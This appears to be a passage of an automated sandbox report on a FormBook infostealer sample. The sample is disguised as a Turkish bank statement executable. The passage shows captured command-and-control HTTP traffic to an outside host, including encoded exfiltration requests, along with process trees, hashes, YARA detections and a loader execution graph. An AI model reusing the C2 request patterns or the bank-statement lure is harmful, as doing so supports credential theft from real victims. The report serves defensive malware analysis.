                                                  Cache-Control: no-cache
                                                  Origin: http://www.ladybillplanet.com
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.ladybillplanet.com/ghii/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 75 79 72 3d 71 50 59 4d 58 4e 6c 66 51 6d 31 32 44 32 74 59 49 61 33 61 6c 5a 4a 68 39 35 7a 6e 4a 32 7a 38 77 4a 4b 71 28 43 61 34 78 69 69 47 70 78 59 39 76 4d 74 36 66 43 66 6f 69 73 6b 31 6d 72 38 36 43 2d 48 68 6e 70 47 5f 4c 45 36 34 66 56 30 56 37 58 72 39 4e 35 52 2d 62 39 61 6a 38 42 51 63 33 42 28 4e 73 37 33 7a 6e 4a 6b 4b 42 61 53 45 66 59 50 30 78 38 73 35 28 37 4f 63 59 46 52 73 6f 32 42 65 45 58 66 6a 79 65 31 32 72 34 49 4b 79 71 7e 76 5a 32 6d 63 50 73 56 7a 32 4d 46 34 62 76 67 62 56 76 64 4c 56 75 67 71 45 34 7e 49 4a 67 29 2e 00 00 00 00 00 00 00 00
                                                  Data Ascii: uyr=qPYMXNlfQm12D2tYIa3alZJh95znJ2z8wJKq(Ca4xiiGpxY9vMt6fCfoisk1mr86C-HhnpG_LE64fV0V7Xr9N5R-b9aj8BQc3B(Ns73znJkKBaSEfYP0x8s5(7OcYFRso2BeEXfjye12r4IKyq~vZ2mcPsVz2MF4bvgbVvdLVugqE4~IJg).
                                                  Feb 14, 2023 08:23:58.749563932 CET81INHTTP/1.1 404 Not Found
                                                  Date: Tue, 14 Feb 2023 07:23:58 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-UA-Compatible: IE=edge
                                                  Link: <https://ladybillplanet.com/wp-json/>; rel="https://api.w.org/"
                                                  Vary: Accept-Encoding
                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                  X-Endurance-Cache-Level: 2
                                                  X-nginx-cache: WordPress
                                                  CF-Cache-Status: DYNAMIC
                                                  Server: cloudflare
                                                  CF-RAY: 79940fb91a5d3621-FRA
                                                  Content-Encoding: gzip
                                                  Data Raw: 32 33 38 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d db 8e dc 46 96 e0 b3 ea 2b 42 14 4a 95 69 93 4c de f3 56 99 6e 5b 96 dd 5e cb 97 b5 e4 35 ba 65 41 88 24 23 33 a9 62 92 34 23 b2 b2 ca e5 04 fa a1 1f 06 8b 05 e6 61 dc c0 62 d7 33 98 79 58 60 5f 16 e8 dd e9 dd e9 87 de fd 20 cb fd 0f 8b 13 11 64 92 99 cc 4b 55 49 c6 60 ac 12 54 45 46 9c 5b 9c 38 71 e2 c4 95 a7 77 df ff ec c1 93 df 7c fe 10 4d d9 2c 1a 1e 9d c2 1f 14 e1 78 32 50 ce 12 ed e3 2f 14 48 23 38 18 1e dd 39 9d 11 86 91 3f c5 19 25 6c a0 7c f9 e4 03 ad a3 14 e9 31 9e 91 c1 49 96 8c 12 46 4f 90 9f c4 8c c4 6c 70 12 27 61 1c 90 0b 15 8d 93 28 4a 16 27 a8 35 3c 2a 21 28 e7 21 59 a4 49 c6 94 02 45 59 84 01 9b 0e 02 72 1e fa 44 e3 2f 2a 0a e3 90 85 38 d2 a8 8f 23 32 30 39 db bb 9a 86 9e 4c 43 8a 68 c8 08 0a 29 4a 52 16 ce c2 6f 49 80 16 21 9b 22 36 25 e8 37 09 a6 0c 3d 7e f8 19 4a a3 f9 24 8c d1 b9 65 e8 26 d2 d0 94 b1 94 f6 5a ad 4b 00 d0 fd 64 d6 5a 24 59 90 66 84 d2 96 00 a5 2d 4a 92 16 d2 34 e0 c5 42 16 91 e1 e7 78 42 50 9c 30 34 4e e6 71 80 34 f4 e3 ff fa bf 3f fd e3 0f e8 c7 ff f9 a7 1f ff f8 07 f4 f2 6f 7f ff d3 7f fd dd 4f 7f ff a7 d3 96 80 cf 75 93 66 49 4a 32 76 39 50 92 49 2f 4a a0 0c a5 f2 9e 25 cf 3f fe 42 01 c5 d4 81 73 4a 25 e8 43 65 d8 4a 10 b4 f5 1c 94 5f 22 ba 9b 06 f5 b3 30 65 88 5d a6 64 a0 e0 34 8d 42 1f b3 30 89 5b 51 f0 f6 0b 9a c4 0a f2 23 4c e9 40 e1 ca d4 a8 3f 25 33 ac 4d 32 9c 4e 95 e1 95 f2 2b ce e6 82 29 3d 25 d7 ba 00 d1 93 6c a2 a8 ca af 04 64 ef e9 95 f2 2b e0 a1 f4 94 af c8 e8 71 c8 08 64 86 41 09 2f c2 c1 e5 28 8c a2 34 c2 31 11 d5 76 6f 41 46 54 c0 ce b3 68 37 ac a2 2a bc e0 bd ad 05 56 95 80 88 e2 86 49 0c 70 7f f9 1f e8 af 7f f8 fd 4f ff e5 fb bf fe e1 87 5c d5 2f ff f8 b7 39 e6 4f ff f8 87 97 ff fc a7 97 ff ed 2f e8 a7 3f fe bf 9f fe fe f7 3f fd cd 7f 46 3f fd c3 df bc fc 8f df a3 97 7f fe fe e5 3f fd f0 e3 bf fc 59 51 95 34 01 3d 87 38 7a d7 17 84 4b 65 7d 4c 70 e6 4f 65 86 aa 30 9c 4d 08 53 7a 2b 80 87 31 cb 2e 3f 4f c2 98 89 32 3e 21 b3 34 c2 8c ec 2e eb 3b 74 70 45 39 e9 e7 8c 64 b3 e7 94 65 61 3c 59 2a 4b 55 f9 66 4e b2 4b 2d 8c d3 39 d4 49 46 be 99 87 19 09 44 83 dc 44 51 96 cf 54 25 8c 1f e1 78 32 c7 13 e0 2a 1c c3 f2 d9 f2 b4 25 74 95 b7
                                                  Data Ascii: 238f}F+BJiLVn[^5eA$#3b4#ab3yX`_ dKUI`TEF[8qw|M,x2P/H#89?%l|1IFOlp'a(J'5<*!(!YIEYrD/*8#209LCh)JRoI!"6%7=~J$e&ZKdZ$Yf-J4BxBP04Nq4?oOufIJ2v9PI/J%?BsJ%CeJ_"0e]d4B0[Q#L@?%3M2N+)=%ld+qdA/(41voAFTh7*VIpO\/9O/??F??YQ4=8zKe}LpOe0MSz+1.?O2>!4.;tpE9dea<Y*KUfNK-9IFDDQT%x2*%t
                                                  Feb 14, 2023 08:23:58.749651909 CET82INData Raw: c6 d6 46 7b d3 79 fb 39 3a 3a 8d c2 f8 0c 65 24 1a 9c 04 31 d5 d2 8c 8c 09 f3 a7 27 68 9a 91 f1 e0 a4 ae 04 c2 55 ec c3 5b 2c 16 fa 24 49 26 11 61 78 32 c3 31 9e 90 ec 70 ec d0 d0 17 69 0d b8 82 23 46 b2 18 94 5c 63 f6 19 a5 6f 5f cc 22 05 f1 b6
                                                  Data Ascii: F{y9::e$1'hU[,$I&ax21pi#F\co_"f_A\wNQ^;\"?HhYa$"%E0JaJ,5[_u+_$#_8-.T==pj|P`2|Ob3&s
                                                  Feb 14, 2023 08:23:58.749716997 CET84INData Raw: 56 49 3d 99 d4 2f 95 7d 47 d1 b9 20 44 f4 ed d7 2f f6 0b da 2a 13 a8 bc 80 d5 91 4c 8b c8 04 fb 97 15 1d 38 ba a5 9b ed 4d 25 ec ac a0 57 2b e8 1a c1 43 aa 68 bb 74 7c ac 1f fa 1a 9b 92 19 d1 44 ee cd 4c a8 42 89 56 a4 da 69 34 93 28 19 c1 5c 90
                                                  Data Ascii: VI=/}G D/*L8M%W+Cht|DLBVi4(\`]Q\^i"`G4?LFz0%Q4/.{:]1IqD4p<<-#AH=\4q2!sb?Od\+=t=KaF\ }
                                                  Feb 14, 2023 08:23:58.749778986 CET85INData Raw: 6d 98 1c ec 1f 6e c3 64 bf d7 b8 0d f5 c3 7c c9 6d 38 5c df c3 dc 86 db ad fc ce 2b 64 7c b0 37 ba 15 cf 1b f8 a8 db 57 e5 75 3c d7 ad 4d f3 3a fe ec f6 45 3b d8 cb dd 9e d5 3e df c7 d7 7f 73 e2 a5 97 57 e2 f3 6e 40 fc 70 5f 77 03 e2 07 f8 b8 1b
                                                  Data Ascii: mnd|m8\+d|7Wu<M:E;>sWn@p_wP=|>&nn\UY75kpuc[}eL^l=x;YYH08=n[st*/Jj~u}hX/&<W/'aP
                                                  Feb 14, 2023 08:23:58.749841928 CET86INData Raw: 0c d6 6b 32 78 71 6f 5a 29 db ca bc 5d b4 03 a3 2c f5 40 38 39 e4 d8 de b5 af c3 cb b1 ca fe 9a 15 81 00 d7 b7 e0 71 50 dd 50 b4 05 73 8b 36 ae dd 4c b9 5f 20 29 e6 21 7f 31 40 a2 48 0f 63 08 47 34 0c 91 28 6f 87 b5 50 f9 dd 1e 1a ce 08 de 06 94
                                                  Data Ascii: k2xqoZ)],@89qPPs6L_ )!1@HcG4(oPIT"(J`vVvS&4Hu_qPC8Z6a~3Df8BjJ)Vea1Dyn5On=qFebEm595dyEYR
                                                  Feb 14, 2023 08:23:58.749902010 CET88INData Raw: 76 fb 77 19 95 90 75 8e bc 76 95 bb 1c da 25 59 e9 62 f1 af 92 2c f8 1c 5c 0f 12 b7 e1 1e 82 53 54 cb e8 32 af 44 53 ef 3a ba c1 55 5b 42 8e f1 39 c9 44 18 72 4e b2 70 2c 4b 59 22 e5 b6 0d af 63 db 81 d7 1d 8f 1d b7 dd 09 46 06 0e 3a a3 31 71 5c
                                                  Data Ascii: vwuv%Yb,\ST2DS:U[B9DrNp,KY"cF:1q\|rq;i;o?z>{2.~~-w?Wi}o>t;Q^?M-RVz;U?<&1%wSzP@kWBXt>,q\Z)Dv2.H7ak
                                                  Feb 14, 2023 08:23:58.749968052 CET89INData Raw: c7 ef ea 76 db d6 e0 b7 85 2c 47 77 bd ae 7c b1 6d bd eb 58 c8 78 64 b9 1e b2 2c 4b 37 dc 6e 64 ba 1c 4b e3 7f ed fd c8 48 bc 72 38 54 86 43 86 84 79 64 75 ba 3a f4 c1 96 eb 09 f2 36 92 5c fc bd c8 5a 29 4f 93 79 e2 a5 2a bd 60 11 69 92 30 92 e2
                                                  Data Ascii: v,Gw|mXxd,K7ndKHr8TCydu:6\Z)Oy*`i0GJ-_:E.BZ@)x..AzE#9&xwL9tIpuG14 :FnzRVx5/8]3>9IrPQ-^x
                                                  Feb 14, 2023 08:23:58.750021935 CET90INData Raw: 20 64 9b 9c 6c 47 3e f3 42 52 20 61 71 72 1e 5a a5 bb 8f 4c b7 a3 1b 1e 32 db 9e ee 18 1d bf 20 84 b8 64 9c 84 8d 56 65 b3 91 94 8c eb d1 41 42 a7 2b dd d8 8f 6c c3 86 d0 df 36 3a ba e3 03 21 f8 2f d4 0d 24 bb 68 a5 7a f7 db 8a 41 c4 49 fc 2d c9
                                                  Data Ascii: dlG>BR aqrZL2 dVeAB+l6:!/$hzAI-/~/@6Kex7?h^)s837s]>$(H|~}CQHlq`yu3D9D_h(dNQD)JsTH22Kg7^,g<m
                                                  Feb 14, 2023 08:23:58.750068903 CET90INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  8192.168.2.54971766.235.200.14680C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Feb 14, 2023 08:24:00.812688112 CET90OUTGET /ghii/?uyr=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XkProQXaSL0hAuoA==&IlOzNN=EyIBgfI12Z HTTP/1.1
                                                  Host: www.ladybillplanet.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Feb 14, 2023 08:24:01.262164116 CET91INHTTP/1.1 301 Moved Permanently
                                                  Date: Tue, 14 Feb 2023 07:24:01 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-UA-Compatible: IE=edge
                                                  X-Redirect-By: WordPress
                                                  Location: http://ladybillplanet.com/ghii/?uyr=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XkProQXaSL0hAuoA==&IlOzNN=EyIBgfI12Z
                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                  X-Endurance-Cache-Level: 2
                                                  X-nginx-cache: WordPress
                                                  CF-Cache-Status: MISS
                                                  Server: cloudflare
                                                  CF-RAY: 79940fc91ec59a00-FRA
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:08:22:00
                                                  Start date:14/02/2023
                                                  Path:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                  Imagebase:0x400000
                                                  File size:286787 bytes
                                                  MD5 hash:9D0B109DD6EFB4A954FF88D024034D3A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Target ID:1
                                                  Start time:08:22:00
                                                  Start date:14/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\tqxwmam.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj
                                                  Imagebase:0x400000
                                                  File size:71680 bytes
                                                  MD5 hash:B3C569394E804A6C34E9677DACE79A23
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 13%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Target ID:2
                                                  Start time:08:22:02
                                                  Start date:14/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\tqxwmam.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\tqxwmam.exe
                                                  Imagebase:0x400000
                                                  File size:71680 bytes
                                                  MD5 hash:B3C569394E804A6C34E9677DACE79A23
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.331329417.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.331329417.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.331329417.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  Reputation:low

                                                  General

                                                  Target ID:3
                                                  Start time:08:22:06
                                                  Start date:14/02/2023
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff69bc80000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:4
                                                  Start time:08:22:15
                                                  Start date:14/02/2023
                                                  Path:C:\Windows\SysWOW64\cmmon32.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                  Imagebase:0x860000
                                                  File size:36864 bytes
                                                  MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.556915588.0000000000900000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.556915588.0000000000900000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.556915588.0000000000900000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.557710413.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.557710413.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.557710413.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.557515887.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.557515887.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.557515887.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  Reputation:high

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:15.9%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:16.4%
                                                    Total number of Nodes:1385
                                                    Total number of Limit Nodes:25
                                                    execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 